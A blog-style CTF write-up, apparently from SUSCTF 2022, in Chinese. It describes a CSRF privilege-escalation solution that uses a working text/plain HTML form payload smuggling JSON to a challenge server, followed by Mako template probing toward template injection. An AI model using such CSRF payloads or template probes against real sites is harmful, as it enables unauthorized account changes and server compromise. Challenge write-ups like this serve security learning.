2022susctf

fxxkcors

考点:

1.CSRF

有个js附件下载下来,据说其内容是用puppeteer去模拟浏览器登录,然后访问我们给定的链接(原理并不清晰)

image-20220706142820383

在登陆后有个提示

image-20220706142854233

只需要更改权限为normal admin就能拿到flag,不是admin登陆的不能修改权限

image-20220706142836314

解题思路

构造CSRF,参考浅谈CSRF,然后利用题目提供的Admin report访问进行CSRF权限提升

还需注意要使Content-Type: text/plain,然后body中是json数据,原因是因为服务没有验证 JSON 的 content-type

表单

<form id=a action="http://124.71.205.122:10002/change.php" method="POST" enctype="text/plain">
<input name='{"username":"fweewfwef", "abc":"' value='123"}'>
</form>
<script> a.submit(); </script> 

HTML practice

提交##会使页面为空,后面发现是mako框架

利用mako框架的循环来验证

% for i in l:
    ${i}
% endfor
% for i in (1,2,3):
    2
% endfor

页面渲染了3个2,确定是mako框架,后翻阅文档.....

posted @ 2022-07-06 14:24  phant0m1  阅读(42)  评论(0编辑  收藏  举报